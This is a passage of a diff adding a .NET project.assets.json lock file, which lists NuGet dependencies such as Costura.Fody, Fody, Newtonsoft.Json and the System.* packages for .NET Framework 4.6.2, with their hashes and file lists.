"runtimes/win/lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll": { + "assetType": "runtime", + "rid": "win" + } + } + }, + "System.Runtime.Numerics/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Numerics" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Security.Cryptography.Algorithms/4.3.0": { + "type": "package", + "dependencies": { + "System.Security.Cryptography.Primitives": "4.3.0" + }, + "frameworkAssemblies": [ + "System.Core", + "mscorlib" + ], + "compile": { + "ref/net461/_._": {} + }, + "runtime": { + "lib/net461/System.Security.Cryptography.Algorithms.dll": {} + }, + "runtimeTargets": { + "runtimes/osx/lib/netstandard1.6/System.Security.Cryptography.Algorithms.dll": { + "assetType": "runtime", + "rid": "osx" + }, + "runtimes/unix/lib/netstandard1.6/System.Security.Cryptography.Algorithms.dll": { + "assetType": "runtime", + "rid": "unix" + }, + "runtimes/win/lib/net461/System.Security.Cryptography.Algorithms.dll": { + "assetType": "runtime", + "rid": "win" + } + } + }, + "System.Security.Cryptography.Encoding/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Security.Cryptography.Encoding.dll": {} + }, + "runtimeTargets": { + "runtimes/unix/lib/netstandard1.3/System.Security.Cryptography.Encoding.dll": { + "assetType": "runtime", + "rid": "unix" + }, + "runtimes/win/lib/net46/System.Security.Cryptography.Encoding.dll": { + "assetType": "runtime", + "rid": "win" + } + } + }, + "System.Security.Cryptography.Primitives/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Security.Cryptography.Primitives.dll": {} + } + }, + "System.Security.Cryptography.X509Certificates/4.3.0": { + "type": "package", + "dependencies": { + "System.Security.Cryptography.Algorithms": "4.3.0", + "System.Security.Cryptography.Encoding": "4.3.0" + }, + "frameworkAssemblies": [ + "System", + "System.Core", + "mscorlib" + ], + "compile": { + "ref/net461/_._": {} + }, + "runtime": { + "lib/net461/System.Security.Cryptography.X509Certificates.dll": {} + }, + "runtimeTargets": { + "runtimes/unix/lib/netstandard1.6/System.Security.Cryptography.X509Certificates.dll": { + "assetType": "runtime", + "rid": "unix" + }, + "runtimes/win/lib/net461/System.Security.Cryptography.X509Certificates.dll": { + "assetType": "runtime", + "rid": "win" + } + } + }, + "System.Text.Encoding/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Text.Encoding.Extensions/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Text.RegularExpressions/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Threading/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "System.Core" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Threading.Tasks/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Core" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Threading.Timer/4.3.0": { + "type": "package", + "compile": { + "ref/net451/_._": {} + }, + "runtime": { + "lib/net451/_._": {} + } + }, + "System.Xml.ReaderWriter/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Xml", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Xml.ReaderWriter.dll": {} + } + }, + "System.Xml.XDocument/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Xml.Linq" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + } + }, + ".NETFramework,Version=v4.6.2/win-x64": { + "Costura.Fody/5.7.0": { + "type": "package", + "dependencies": { + "Fody": "6.5.5", + "NETStandard.Library": "1.6.1" + }, + "compile": { + "lib/netstandard1.0/_._": { + "related": ".pdb;.xml" + } + }, + "runtime": { + "lib/netstandard1.0/Costura.dll": { + "related": ".pdb;.xml" + } + }, + "build": { + "build/Costura.Fody.props": {}, + "build/Costura.Fody.targets": {} + } + }, + "Fody/6.8.0": { + "type": "package", + "build": { + "build/Fody.targets": {} + } + }, + "Microsoft.NETCore.Platforms/1.1.0": { + "type": "package", + "compile": { + "lib/netstandard1.0/_._": {} + }, + "runtime": { + "lib/netstandard1.0/_._": {} + } + }, + "Microsoft.NETFramework.ReferenceAssemblies/1.0.3": { + "type": "package", + "dependencies": { + "Microsoft.NETFramework.ReferenceAssemblies.net462": "1.0.3" + } + }, + "Microsoft.NETFramework.ReferenceAssemblies.net462/1.0.3": { + "type": "package", + "build": { + "build/Microsoft.NETFramework.ReferenceAssemblies.net462.targets": {} + } + }, + "Microsoft.Win32.Primitives/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/Microsoft.Win32.Primitives.dll": {} + } + }, + "NETStandard.Library/1.6.1": { + "type": "package", + "dependencies": { + "Microsoft.NETCore.Platforms": "1.1.0", + "Microsoft.Win32.Primitives": "4.3.0", + "System.AppContext": "4.3.0", + "System.Collections": "4.3.0", + "System.Collections.Concurrent": "4.3.0", + "System.Console": "4.3.0", + "System.Diagnostics.Debug": "4.3.0", + "System.Diagnostics.Tools": "4.3.0", + "System.Diagnostics.Tracing": "4.3.0", + "System.Globalization": "4.3.0", + "System.Globalization.Calendars": "4.3.0", + "System.IO": "4.3.0", + "System.IO.Compression": "4.3.0", + "System.IO.Compression.ZipFile": "4.3.0", + "System.IO.FileSystem": "4.3.0", + "System.IO.FileSystem.Primitives": "4.3.0", + "System.Linq": "4.3.0", + "System.Linq.Expressions": "4.3.0", + "System.Net.Http": "4.3.0", + "System.Net.Primitives": "4.3.0", + "System.Net.Sockets": "4.3.0", + "System.ObjectModel": "4.3.0", + "System.Reflection": "4.3.0", + "System.Reflection.Extensions": "4.3.0", + "System.Reflection.Primitives": "4.3.0", + "System.Resources.ResourceManager": "4.3.0", + "System.Runtime": "4.3.0", + "System.Runtime.Extensions": "4.3.0", + "System.Runtime.Handles": "4.3.0", + "System.Runtime.InteropServices": "4.3.0", + "System.Runtime.InteropServices.RuntimeInformation": "4.3.0", + "System.Runtime.Numerics": "4.3.0", + "System.Security.Cryptography.Algorithms": "4.3.0", + "System.Security.Cryptography.Encoding": "4.3.0", + "System.Security.Cryptography.Primitives": "4.3.0", + "System.Security.Cryptography.X509Certificates": "4.3.0", + "System.Text.Encoding": "4.3.0", + "System.Text.Encoding.Extensions": "4.3.0", + "System.Text.RegularExpressions": "4.3.0", + "System.Threading": "4.3.0", + "System.Threading.Tasks": "4.3.0", + "System.Threading.Timer": "4.3.0", + "System.Xml.ReaderWriter": "4.3.0", + "System.Xml.XDocument": "4.3.0" + } + }, + "Newtonsoft.Json/13.0.3": { + "type": "package", + "compile": { + "lib/net45/Newtonsoft.Json.dll": { + "related": ".xml" + } + }, + "runtime": { + "lib/net45/Newtonsoft.Json.dll": { + "related": ".xml" + } + } + }, + "System.AppContext/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.AppContext.dll": {} + } + }, + "System.Collections/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "System.Core" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Collections.Concurrent/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Console/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Console.dll": {} + } + }, + "System.Diagnostics.Debug/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Diagnostics.DiagnosticSource/4.3.0": { + "type": "package", + "compile": { + "lib/net46/_._": { + "related": ".xml" + } + }, + "runtime": { + "lib/net46/System.Diagnostics.DiagnosticSource.dll": { + "related": ".xml" + } + } + }, + "System.Diagnostics.Tools/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Diagnostics.Tracing/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.Diagnostics.Tracing.dll": {} + } + }, + "System.Globalization/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Globalization.Calendars/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Globalization.Calendars.dll": {} + } + }, + "System.IO/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.IO.dll": {} + } + }, + "System.IO.Compression/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "runtimes/win/lib/net46/System.IO.Compression.dll": {} + } + }, + "System.IO.Compression.ZipFile/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.IO.Compression.FileSystem", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.IO.Compression.ZipFile.dll": {} + } + }, + "System.IO.FileSystem/4.3.0": { + "type": "package", + "dependencies": { + "System.IO.FileSystem.Primitives": "4.3.0" + }, + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.IO.FileSystem.dll": {} + } + }, + "System.IO.FileSystem.Primitives/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.IO.FileSystem.Primitives.dll": {} + } + }, + "System.Linq/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Core" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Linq.Expressions/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Core" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Net.Http/4.3.0": { + "type": "package", + "dependencies": { + "System.Diagnostics.DiagnosticSource": "4.3.0", + "System.Security.Cryptography.X509Certificates": "4.3.0" + }, + "frameworkAssemblies": [ + "System", + "System.Core", + "mscorlib" + ], + "compile": { + "ref/net46/_._": { + "related": ".xml" + } + }, + "runtime": { + "runtimes/win/lib/net46/System.Net.Http.dll": {} + } + }, + "System.Net.Primitives/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Net.Sockets/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Net.Sockets.dll": {} + } + }, + "System.ObjectModel/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Reflection/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.Reflection.dll": {} + } + }, + "System.Reflection.Extensions/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Reflection.Primitives/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Resources.ResourceManager/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Runtime/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "System.ComponentModel.Composition", + "System.Core", + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.Runtime.dll": {} + } + }, + "System.Runtime.Extensions/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.Runtime.Extensions.dll": {} + } + }, + "System.Runtime.Handles/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Core" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/_._": {} + } + }, + "System.Runtime.InteropServices/4.3.0": { + "type": "package", + "dependencies": { + "System.Runtime": "4.3.0" + }, + "frameworkAssemblies": [ + "System", + "System.Core", + "mscorlib" + ], + "compile": { + "ref/net462/_._": {} + }, + "runtime": { + "lib/net462/System.Runtime.InteropServices.dll": {} + } + }, + "System.Runtime.InteropServices.RuntimeInformation/4.3.0": { + "type": "package", + "compile": { + "ref/netstandard1.1/_._": {} + }, + "runtime": { + "runtimes/win/lib/net45/System.Runtime.InteropServices.RuntimeInformation.dll": {} + } + }, + "System.Runtime.Numerics/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Numerics" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Security.Cryptography.Algorithms/4.3.0": { + "type": "package", + "dependencies": { + "System.Security.Cryptography.Primitives": "4.3.0" + }, + "frameworkAssemblies": [ + "System.Core", + "mscorlib" + ], + "compile": { + "ref/net461/_._": {} + }, + "runtime": { + "runtimes/win/lib/net461/System.Security.Cryptography.Algorithms.dll": {} + } + }, + "System.Security.Cryptography.Encoding/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "runtimes/win/lib/net46/System.Security.Cryptography.Encoding.dll": {} + } + }, + "System.Security.Cryptography.Primitives/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Security.Cryptography.Primitives.dll": {} + } + }, + "System.Security.Cryptography.X509Certificates/4.3.0": { + "type": "package", + "dependencies": { + "System.Security.Cryptography.Algorithms": "4.3.0", + "System.Security.Cryptography.Encoding": "4.3.0" + }, + "frameworkAssemblies": [ + "System", + "System.Core", + "mscorlib" + ], + "compile": { + "ref/net461/_._": {} + }, + "runtime": { + "runtimes/win/lib/net461/System.Security.Cryptography.X509Certificates.dll": {} + } + }, + "System.Text.Encoding/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Text.Encoding.Extensions/4.3.0": { + "type": "package", + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Text.RegularExpressions/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Threading/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System", + "System.Core" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Threading.Tasks/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Core" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + }, + "System.Threading.Timer/4.3.0": { + "type": "package", + "compile": { + "ref/net451/_._": {} + }, + "runtime": { + "lib/net451/_._": {} + } + }, + "System.Xml.ReaderWriter/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Xml", + "mscorlib" + ], + "compile": { + "ref/net46/_._": {} + }, + "runtime": { + "lib/net46/System.Xml.ReaderWriter.dll": {} + } + }, + "System.Xml.XDocument/4.3.0": { + "type": "package", + "frameworkAssemblies": [ + "System.Xml.Linq" + ], + "compile": { + "ref/net45/_._": {} + }, + "runtime": { + "lib/net45/_._": {} + } + } + } + }, + "libraries": { + "Costura.Fody/5.7.0": { + "sha512": "MmL28WOOnJEBWORXj6bfSxfWaZW8gWSXEJTdrjB9AQi4COX6RXr2xdGL9HsxpWwn6f5Io0NmNuwFJe94w1YmQA==", + "type": "package", + "path": "costura.fody/5.7.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "build/Costura.Fody.props", + "build/Costura.Fody.targets", + "costura.fody.5.7.0.nupkg.sha512", + "costura.fody.nuspec", + "icon.png", + "lib/netstandard1.0/Costura.dll", + "lib/netstandard1.0/Costura.pdb", + "lib/netstandard1.0/Costura.xml", + "netclassicweaver/Costura.Fody.dll", + "netclassicweaver/Costura.Fody.xcf", + "netstandardweaver/Costura.Fody.dll", + "netstandardweaver/Costura.Fody.xcf" + ] + }, + "Fody/6.8.0": { + "sha512": "hfZ/f8Mezt8aTkgv9nsvFdYoQ809/AqwsJlOGOPYIfBcG2aAIG3v3ex9d8ZqQuFYyMoucjRg4eKy3VleeGodKQ==", + "type": "package", + "path": "fody/6.8.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "License.txt", + "build/Fody.targets", + "fody.6.8.0.nupkg.sha512", + "fody.nuspec", + "netclassictask/Fody.dll", + "netclassictask/FodyCommon.dll", + "netclassictask/FodyHelpers.dll", + "netclassictask/FodyIsolated.dll", + "netclassictask/Mono.Cecil.Pdb.dll", + "netclassictask/Mono.Cecil.Pdb.pdb", + "netclassictask/Mono.Cecil.Rocks.dll", + "netclassictask/Mono.Cecil.Rocks.pdb", + "netclassictask/Mono.Cecil.dll", + "netclassictask/Mono.Cecil.pdb", + "netstandardtask/Fody.dll", + "netstandardtask/FodyCommon.dll", + "netstandardtask/FodyHelpers.dll", + "netstandardtask/FodyIsolated.dll", + "netstandardtask/Mono.Cecil.Pdb.dll", + "netstandardtask/Mono.Cecil.Pdb.pdb", + "netstandardtask/Mono.Cecil.Rocks.dll", + "netstandardtask/Mono.Cecil.Rocks.pdb", + "netstandardtask/Mono.Cecil.dll", + "netstandardtask/Mono.Cecil.pdb" + ] + }, + "Microsoft.NETCore.Platforms/1.1.0": { + "sha512": "kz0PEW2lhqygehI/d6XsPCQzD7ff7gUJaVGPVETX611eadGsA3A877GdSlU0LRVMCTH/+P3o2iDTak+S08V2+A==", + "type": "package", + "path": "microsoft.netcore.platforms/1.1.0", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "ThirdPartyNotices.txt", + "dotnet_library_license.txt", + "lib/netstandard1.0/_._", + "microsoft.netcore.platforms.1.1.0.nupkg.sha512", + "microsoft.netcore.platforms.nuspec", + "runtime.json" + ] + }, + "Microsoft.NETFramework.ReferenceAssemblies/1.0.3": { + "sha512": "vUc9Npcs14QsyOD01tnv/m8sQUnGTGOw1BCmKcv77LBJY7OxhJ+zJF7UD/sCL3lYNFuqmQEVlkfS4Quif6FyYg==", + "type": "package", + "path": "microsoft.netframework.referenceassemblies/1.0.3", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "microsoft.netframework.referenceassemblies.1.0.3.nupkg.sha512", + "microsoft.netframework.referenceassemblies.nuspec" + ] + }, + "Microsoft.NETFramework.ReferenceAssemblies.net462/1.0.3": { + "sha512": "IzAV30z22ESCeQfxP29oVf4qEo8fBGXLXSU6oacv/9Iqe6PzgHDKCaWfwMBak7bSJQM0F5boXWoZS+kChztRIQ==", + "type": "package", + "path": "microsoft.netframework.referenceassemblies.net462/1.0.3", + "files": [ + ".nupkg.metadata", + ".signature.p7s", + "build/.NETFramework/v4.6.2/Accessibility.dll", + "build/.NETFramework/v4.6.2/Accessibility.xml", + "build/.NETFramework/v4.6.2/CustomMarshalers.dll", + "build/.NETFramework/v4.6.2/CustomMarshalers.xml", + "build/.NETFramework/v4.6.2/Facades/System.Collections.Concurrent.dll", + "build/.NETFramework/v4.6.2/Facades/System.Collections.dll", + "build/.NETFramework/v4.6.2/Facades/System.ComponentModel.Annotations.dll", + "build/.NETFramework/v4.6.2/Facades/System.ComponentModel.EventBasedAsync.dll", + "build/.NETFramework/v4.6.2/Facades/System.ComponentModel.dll", + "build/.NETFramework/v4.6.2/Facades/System.Diagnostics.Contracts.dll", + "build/.NETFramework/v4.6.2/Facades/System.Diagnostics.Debug.dll", + "build/.NETFramework/v4.6.2/Facades/System.Diagnostics.Tools.dll", + "build/.NETFramework/v4.6.2/Facades/System.Diagnostics.Tracing.dll", + "build/.NETFramework/v4.6.2/Facades/System.Dynamic.Runtime.dll", + "build/.NETFramework/v4.6.2/Facades/System.Globalization.dll", + "build/.NETFramework/v4.6.2/Facades/System.IO.dll", + "build/.NETFramework/v4.6.2/Facades/System.Linq.Expressions.dll", + "build/.NETFramework/v4.6.2/Facades/System.Linq.Parallel.dll", + "build/.NETFramework/v4.6.2/Facades/System.Linq.Queryable.dll", + "build/.NETFramework/v4.6.2/Facades/System.Linq.dll", + "build/.NETFramework/v4.6.2/Facades/System.Net.NetworkInformation.dll", + "build/.NETFramework/v4.6.2/Facades/System.Net.Primitives.dll", + "build/.NETFramework/v4.6.2/Facades/System.Net.Requests.dll", + "build/.NETFramework/v4.6.2/Facades/System.Net.WebHeaderCollection.dll", + "build/.NETFramework/v4.6.2/Facades/System.ObjectModel.dll", + "build/.NETFramework/v4.6.2/Facades/System.Reflection.Emit.ILGeneration.dll", + "build/.NETFramework/v4.6.2/Facades/System.Reflection.Emit.Lightweight.dll", + "build/.NETFramework/v4.6.2/Facades/System.Reflection.Emit.dll", + "build/.NETFramework/v4.6.2/Facades/System.Reflection.Extensions.dll", + "build/.NETFramework/v4.6.2/Facades/System.Reflection.Primitives.dll", + "build/.NETFramework/v4.6.2/Facades/System.Reflection.dll", + "build/.NETFramework/v4.6.2/Facades/System.Resources.ResourceManager.dll", + "build/.NETFramework/v4.6.2/Facades/System.Runtime.Extensions.dll", + "build/.NETFramework/v4.6.2/Facades/System.Runtime.Handles.dll", + "build/.NETFramework/v4.6.2/Facades/System.Runtime.InteropServices.WindowsRuntime.dll", + "build/.NETFramework/v4.6.2/Facades/System.Runtime.InteropServices.dll", + "build/.NETFramework/v4.6.2/Facades/System.Runtime.Numerics.dll", + "build/.NETFramework/v4.6.2/Facades/System.Runtime.Serialization.Json.dll", + "build/.NETFramework/v4.6.2/Facades/System.Runtime.Serialization.Primitives.dll", + "build/.NETFramework/v4.6.2/Facades/System.Runtime.Serialization.Xml.dll", + "build/.NETFramework/v4.6.2/Facades/System.Runtime.dll", + "build/.NETFramework/v4.6.2/Facades/System.Security.Principal.dll", + "build/.NETFramework/v4.6.2/Facades/System.ServiceModel.Duplex.dll", + "build/.NETFramework/v4.6.2/Facades/System.ServiceModel.Http.dll", + "build/.NETFramework/v4.6.2/Facades/System.ServiceModel.NetTcp.dll", + "build/.NETFramework/v4.6.2/Facades/System.ServiceModel.Primitives.dll", + "build/.NETFramework/v4.6.2/Facades/System.ServiceModel.Security.dll", + "build/.NETFramework/v4.6.2/Facades/System.Text.Encoding.Extensions.dll", + "build/.NETFramework/v4.6.2/Facades/System.Text.Encoding.dll", + "build/.NETFramework/v4.6.2/Facades/System.Text.RegularExpressions.dll", + "build/.NETFramework/v4.6.2/Facades/System.Threading.Tasks.Parallel.dll", + "build/.NETFramework/v4.6.2/Facades/System.Threading.Tasks.dll", + "build/.NETFramework/v4.6.2/Facades/System.Threading.Timer.dll", + "build/.NETFramework/v4.6.2/Facades/System.Threading.dll", + "build/.NETFramework/v4.6.2/Facades/System.Xml.ReaderWriter.dll", + "build/.NETFramework/v4.6.2/Facades/System.Xml.XDocument.dll", + "build/.NETFramework/v4.6.2/Facades/System.Xml.XmlSerializer.dll", + "build/.NETFramework/v4.6.2/ISymWrapper.dll", + "build/.NETFramework/v4.6.2/ISymWrapper.xml", + "build/.NETFramework/v4.6.2/Microsoft.Activities.Build.dll", + "build/.NETFramework/v4.6.2/Microsoft.Activities.Build.xml", + "build/.NETFramework/v4.6.2/Microsoft.Build.Conversion.v4.0.dll", + "build/.NETFramework/v4.6.2/Microsoft.Build.Conversion.v4.0.xml", + "build/.NETFramework/v4.6.2/Microsoft.Build.Engine.dll", + "build/.NETFramework/v4.6.2/Microsoft.Build.Engine.xml", + "build/.NETFramework/v4.6.2/Microsoft.Build.Framework.dll", + "build/.NETFramework/v4.6.2/Microsoft.Build.Framework.xml", + "build/.NETFramework/v4.6.2/Microsoft.Build.Tasks.v4.0.dll", + "build/.NETFramework/v4.6.2/Microsoft.Build.Tasks.v4.0.xml", + "build/.NETFramework/v4.6.2/Microsoft.Build.Utilities.v4.0.dll", + "build/.NETFramework/v4.6.2/Microsoft.Build.Utilities.v4.0.xml", + "build/.NETFramework/v4.6.2/Microsoft.Build.dll", + "build/.NETFramework/v4.6.2/Microsoft.Build.xml", + "build/.NETFramework/v4.6.2/Microsoft.CSharp.dll", + "build/.NETFramework/v4.6.2/Microsoft.CSharp.xml", + "build/.NETFramework/v4.6.2/Microsoft.JScript.dll", + "build/.NETFramework/v4.6.2/Microsoft.JScript.xml", + "build/.NETFramework/v4.6.2/Microsoft.VisualBasic.Compatibility.Data.dll", + "build/.NETFramework/v4.6.2/Microsoft.VisualBasic.Compatibility.Data.xml", + "build/.NETFramework/v4.6.2/Microsoft.VisualBasic.Compatibility.dll", + "build/.NETFramework/v4.6.2/Microsoft.VisualBasic.Compatibility.xml", + "build/.NETFramework/v4.6.2/Microsoft.VisualBasic.dll", + "build/.NETFramework/v4.6.2/Microsoft.VisualBasic.xml", + "build/.NETFramework/v4.6.2/Microsoft.VisualC.STLCLR.dll", + "build/.NETFramework/v4.6.2/Microsoft.VisualC.STLCLR.xml", + "build/.NETFramework/v4.6.2/Microsoft.VisualC.dll", + "build/.NETFramework/v4.6.2/Microsoft.VisualC.xml", + "build/.NETFramework/v4.6.2/PermissionSets/FullTrust.xml", + "build/.NETFramework/v4.6.2/PermissionSets/Internet.xml", + "build/.NETFramework/v4.6.2/PermissionSets/LocalIntranet.xml", + "build/.NETFramework/v4.6.2/PresentationBuildTasks.dll", + "build/.NETFramework/v4.6.2/PresentationBuildTasks.xml", + "build/.NETFramework/v4.6.2/PresentationCore.dll", + "build/.NETFramework/v4.6.2/PresentationCore.xml", + "build/.NETFramework/v4.6.2/PresentationFramework.Aero.dll", + "build/.NETFramework/v4.6.2/PresentationFramework.Aero.xml", + "build/.NETFramework/v4.6.2/PresentationFramework.Aero2.dll", + "build/.NETFramework/v4.6.2/PresentationFramework.Aero2.xml", + "build/.NETFramework/v4.6.2/PresentationFramework.AeroLite.dll", + "build/.NETFramework/v4.6.2/PresentationFramework.AeroLite.xml", + "build/.NETFramework/v4.6.2/PresentationFramework.Classic.dll", + "build/.NETFramework/v4.6.2/PresentationFramework.Classic.xml", + "build/.NETFramework/v4.6.2/PresentationFramework.Luna.dll", + "build/.NETFramework/v4.6.2/PresentationFramework.Luna.xml", + "build/.NETFramework/v4.6.2/PresentationFramework.Royale.dll", + "build/.NETFramework/v4.6.2/PresentationFramework.Royale.xml", + "build/.NETFramework/v4.6.2/PresentationFramework.dll", + "build/.NETFramework/v4.6.2/PresentationFramework.xml", + "build/.NETFramework/v4.6.2/ReachFramework.dll", + "build/.NETFramework/v4.6.2/ReachFramework.xml", + "build/.NETFramework/v4.6.2/RedistList/FrameworkList.xml", + "build/.NETFramework/v4.6.2/System.Activities.Core.Presentation.dll", + "build/.NETFramework/v4.6.2/System.Activities.Core.Presentation.xml", + "build/.NETFramework/v4.6.2/System.Activities.DurableInstancing.dll", + "build/.NETFramework/v4.6.2/System.Activities.DurableInstancing.xml", + "build/.NETFramework/v4.6.2/System.Activities.Presentation.dll", + "build/.NETFramework/v4.6.2/System.Activities.Presentation.xml", + "build/.NETFramework/v4.6.2/System.Activities.dll", + "build/.NETFramework/v4.6.2/System.Activities.xml", + "build/.NETFramework/v4.6.2/System.AddIn.Contract.dll", + "build/.NETFramework/v4.6.2/System.AddIn.Contract.xml", + "build/.NETFramework/v4.6.2/System.AddIn.dll", + "build/.NETFramework/v4.6.2/System.AddIn.xml", + "build/.NETFramework/v4.6.2/System.ComponentModel.Composition.Registration.dll", + "build/.NETFramework/v4.6.2/System.ComponentModel.Composition.Registration.xml", + "build/.NETFramework/v4.6.2/System.ComponentModel.Composition.dll", + "build/.NETFramework/v4.6.2/System.ComponentModel.Composition.xml", + "build/.NETFramework/v4.6.2/System.ComponentModel.DataAnnotations.dll", + "build/.NETFramework/v4.6.2/System.ComponentModel.DataAnnotations.xml", + "build/.NETFramework/v4.6.2/System.Configuration.Install.dll", + "build/.NETFramework/v4.6.2/System.Configuration.Install.xml", + "build/.NETFramework/v4.6.2/System.Configuration.dll", + "build/.NETFramework/v4.6.2/System.Configuration.xml", + "build/.NETFramework/v4.6.2/System.Core.dll", + "build/.NETFramework/v4.6.2/System.Core.xml", + "build/.NETFramework/v4.6.2/System.Data.DataSetExtensions.dll", + "build/.NETFramework/v4.6.2/System.Data.DataSetExtensions.xml", + "build/.NETFramework/v4.6.2/System.Data.Entity.Design.dll", + 